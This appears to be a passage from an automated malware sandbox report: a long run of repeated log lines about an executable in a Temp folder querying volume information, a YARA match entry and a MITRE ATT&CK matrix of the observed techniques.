              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: Yara matchFile source: 0000001D.00000002.2269970604.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Command and Scripting Interpreter              		3
              Browser Extensions              		11
              Process Injection              		11
              Masquerading              		1
              Credential API Hooking              		11
              Security Software Discovery              		Remote Services1
              Credential API Hooking              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              PowerShell              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Disable or Modify Tools              		11
              Input Capture              		1
              Process Discovery              		Remote Desktop Protocol11
              Input Capture              		3
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              Extra Window Memory Injection              		31
              Virtualization/Sandbox Evasion              		Security Account Manager31
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture5
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets1
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Extra Window Memory Injection              		Cached Domain Credentials21
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.